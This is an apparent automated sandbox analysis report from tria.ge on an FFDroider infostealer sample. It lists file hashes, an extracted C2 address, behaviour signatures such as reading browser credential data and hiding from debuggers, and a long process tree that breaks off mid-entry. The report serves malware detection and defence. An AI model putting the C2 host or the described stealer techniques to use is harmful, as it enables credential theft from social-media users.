Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    147s
  • max time network
    151s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    25/12/2024, 02:03 UTC

General

  • Target

    dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe

  • Size

    4.3MB

  • MD5

    3aa667aff44754cd87a6eb4cb347a91b

  • SHA1

    1013d521a4b5f6a5e1a39773c0cdb9364a0ae618

  • SHA256

    dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba

  • SHA512

    a392b44659e052edf0b027648eea2b69a6043c1eb4bdc4f38c1310dfb86c0f8e950329a7e89ace02f1c331189786c0adb0eec328dba4ac62aca595922c3e6238

  • SSDEEP

    98304:iL5LNYSnH/qy3N5MFRa1wR+ByBQJTWCsizJHaDi6FkEXV9D527BWG:iLxLHI21wR3BQTWdaJHPyfDVQBWG

Malware Config

Extracted

Family

ffdroider

C2

http://186.2.171.17

Signatures

  • FFDroider

    Stealer targeting social media platform users first seen in April 2022.

  • FFDroider payload 6 IoCs
  • Ffdroider family
  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 42 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in System32 directory 16 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe
    "C:\Users\Admin\AppData\Local\Temp\dcd0da0e2a4791de9578d997e9022710e9c88414c4421a95988897b61e4841ba.exe"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of AdjustPrivilegeToken
    PID:840
  • C:\Windows\System32\alg.exe
    C:\Windows\System32\alg.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Suspicious use of AdjustPrivilegeToken
    PID:780
  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe
    1⤵
    • Executes dropped EXE
    PID:2312
  • C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
    1⤵
    • Executes dropped EXE
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    PID:2824
  • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe
    1⤵
    • Executes dropped EXE
    • Drops file in Windows directory
    PID:2692
  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
    1⤵
    • Executes dropped EXE
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e8 -InterruptEvent 1d4 -NGENProcess 1d8 -Pipe 1e4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:1696
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 258 -InterruptEvent 1d4 -NGENProcess 1d8 -Pipe 1e8 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1704
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d4 -InterruptEvent 25c -NGENProcess 24c -Pipe 248 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2572
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d4 -InterruptEvent 254 -NGENProcess 258 -Pipe 23c -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2256
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1f0 -InterruptEvent 264 -NGENProcess 244 -Pipe 1d4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2708
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 1d8 -NGENProcess 258 -Pipe 24c -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3020
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 1d8 -NGENProcess 264 -Pipe 254 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:584
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1d8 -InterruptEvent 26c -NGENProcess 258 -Pipe 270 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:660
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 250 -InterruptEvent 268 -NGENProcess 274 -Pipe 1d8 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:1472
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 268 -InterruptEvent 274 -NGENProcess 25c -Pipe 278 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:1560
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 244 -NGENProcess 260 -Pipe 1f0 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:876
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 27c -InterruptEvent 268 -NGENProcess 280 -Pipe 274 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2812
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 264 -InterruptEvent 250 -NGENProcess 284 -Pipe 27c -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2600
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 250 -InterruptEvent 258 -NGENProcess 280 -Pipe 26c -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3028
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 258 -InterruptEvent 288 -NGENProcess 268 -Pipe 25c -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:3040
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 288 -InterruptEvent 28c -NGENProcess 284 -Pipe 240 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2488
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 28c -InterruptEvent 290 -NGENProcess 280 -Pipe 260 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:3020
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 290 -InterruptEvent 298 -NGENProcess 268 -Pipe 294 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:2452
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 298 -InterruptEvent 2a0 -NGENProcess 244 -Pipe 29c -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2992
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent 250 -NGENProcess 244 -Pipe 290 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:2316
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 250 -InterruptEvent 284 -NGENProcess 298 -Pipe 258 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1560
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 280 -InterruptEvent 2a4 -NGENProcess 2a8 -Pipe 250 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:2516
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2a4 -InterruptEvent 264 -NGENProcess 298 -Pipe 288 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2104
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 284 -InterruptEvent 1c4 -NGENProcess 21c -Pipe 2ac -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2868
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1c4 -InterruptEvent 2d4 -NGENProcess 264 -Pipe 2d0 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:236
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2d4 -InterruptEvent 2d8 -NGENProcess 2c4 -Pipe 2cc -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1220
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 2c4 -NGENProcess 284 -Pipe 2e0 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:2320
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2c4 -InterruptEvent 2c0 -NGENProcess 2dc -Pipe 2a4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      PID:2168
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2c0 -InterruptEvent 284 -NGENProcess 2dc -Pipe 1c4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:2368
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 284 -InterruptEvent 2ec -NGENProcess 2e4 -Pipe 2e8 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      PID:2192
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2ec -InterruptEvent 2e4 -NGENProcess 2c0 -Pipe 2c8 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1848
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2e4 -InterruptEvent 2f4 -NGENProcess 2dc -Pipe 2d4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      PID:2728
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2f4 -InterruptEvent 2dc -NGENProcess 2ec -Pipe 2f0 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1540
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2dc -InterruptEvent 2fc -NGENProcess 2c0 -Pipe 284 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:2948
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2fc -InterruptEvent 2c0 -NGENProcess 2f4 -Pipe 2f8 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:1048
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2c0 -InterruptEvent 304 -NGENProcess 2ec -Pipe 2e4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:1456
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 304 -InterruptEvent 2ec -NGENProcess 2fc -Pipe 300 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2536
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2ec -InterruptEvent 30c -NGENProcess 2f4 -Pipe 2dc -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:1736
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 30c -InterruptEvent 2f4 -NGENProcess 304 -Pipe 308 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2352
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2f4 -InterruptEvent 314 -NGENProcess 2fc -Pipe 2c0 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      PID:3028
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 314 -InterruptEvent 2fc -NGENProcess 30c -Pipe 310 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:1744
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2fc -InterruptEvent 31c -NGENProcess 304 -Pipe 2ec -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:1988
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 31c -InterruptEvent 304 -NGENProcess 314 -Pipe 318 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2904
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 304 -InterruptEvent 324 -NGENProcess 30c -Pipe 2f4 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      PID:1812
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 324 -InterruptEvent 30c -NGENProcess 31c -Pipe 320 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      PID:2728
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 30c -InterruptEvent 32c -NGENProcess 314 -Pipe 2fc -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:580
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 32c -InterruptEvent 314 -NGENProcess 324 -Pipe 328 -Comment "NGen Worker Process"
      2⤵
      • Executes dropped EXE
      PID:920
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 314 -InterruptEvent 334 -NGENProcess 31c -Pipe 304 -Comment "NGen Worker Process"
      2⤵
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:2816
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 334 -InterruptEvent 31c -NGENProcess 32c -Pipe 330 -Comment "NGen Worker Process"
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2636
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 31c -InterruptEvent 33c -NGENProcess 324 -Pipe 30c -Comment "NGen Worker Process"
      2⤵
      • Loads dropped DLL
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      PID:2828
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 33c -InterruptEvent 324 -NGENProcess 334 -Pipe 338 -Comment "NGen Worker Process"
      2⤵
        PID:2516
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 324 -InterruptEvent 344 -NGENProcess 32c -Pipe 314 -Comment "NGen Worker Process"
        2⤵
        • Loads dropped DLL
        • Drops file in Windows directory
        PID:2332
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 344 -InterruptEvent 32c -NGENProcess 33c -Pipe 340 -Comment "NGen Worker Process"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2232
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 32c -InterruptEvent 34c -NGENProcess 334 -Pipe 31c -Comment "NGen Worker Process"
        2⤵
        • Loads dropped DLL
        • Drops file in Windows directory
        PID:1716
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 34c -InterruptEvent 334 -NGENProcess 344 -Pipe 348 -Comment "NGen Worker Process"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1396
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 334 -InterruptEvent 354 -NGENProcess 33c -Pipe 324 -Comment "NGen Worker Process"
        2⤵
        • Loads dropped DLL
        • Drops file in Windows directory
        PID:1372
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 354 -InterruptEvent 33c -NGENProcess 34c -Pipe 350 -Comment "NGen Worker Process"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:1748
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 33c -InterruptEvent 35c -NGENProcess 344 -Pipe 32c -Comment "NGen Worker Process"
        2⤵
        • Loads dropped DLL
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        PID:392
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 35c -InterruptEvent 33c -NGENProcess 358 -Pipe 264 -Comment "NGen Worker Process"
        2⤵
        • Modifies data under HKEY_USERS
        PID:2580
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 33c -InterruptEvent 2d8 -NGENProcess 360 -Pipe 334 -Comment "NGen Worker Process"
        2⤵
        • System Location Discovery: System Language Discovery
        PID:2828
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 368 -NGENProcess 344 -Pipe 21c -Comment "NGen Worker Process"
        2⤵
          PID:2108
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 368 -InterruptEvent 36c -NGENProcess 358 -Pipe 354 -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1996
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 36c -InterruptEvent 358 -NGENProcess 33c -Pipe 374 -Comment "NGen Worker Process"
          2⤵
          • Loads dropped DLL
          • Drops file in Windows directory
          PID:2276
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 358 -InterruptEvent 33c -NGENProcess 2d8 -Pipe 370 -Comment "NGen Worker Process"
          2⤵
          • Loads dropped DLL
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          PID:2876
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 33c -InterruptEvent 2d8 -NGENProcess 35c -Pipe 368 -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2584
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 37c -InterruptEvent 2d8 -NGENProcess 33c -Pipe 364 -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:1640
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 2d8 -InterruptEvent 360 -NGENProcess 35c -Pipe 36c -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          • Modifies data under HKEY_USERS
          PID:1224
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 360 -InterruptEvent 384 -NGENProcess 34c -Pipe 344 -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2948
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 384 -InterruptEvent 388 -NGENProcess 33c -Pipe 380 -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2976
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 388 -InterruptEvent 38c -NGENProcess 35c -Pipe 358 -Comment "NGen Worker Process"
          2⤵
          • System Location Discovery: System Language Discovery
          PID:2060
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 38c -InterruptEvent 390 -NGENProcess 34c -Pipe 37c -Comment "NGen Worker Process"
          2⤵
            PID:2552
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 390 -InterruptEvent 394 -NGENProcess 33c -Pipe 2d8 -Comment "NGen Worker Process"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2124
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 394 -InterruptEvent 398 -NGENProcess 35c -Pipe 360 -Comment "NGen Worker Process"
            2⤵
            • System Location Discovery: System Language Discovery
            PID:2320
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 398 -InterruptEvent 39c -NGENProcess 34c -Pipe 384 -Comment "NGen Worker Process"
            2⤵
              PID:316
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 39c -InterruptEvent 3a0 -NGENProcess 33c -Pipe 388 -Comment "NGen Worker Process"
              2⤵
              • System Location Discovery: System Language Discovery
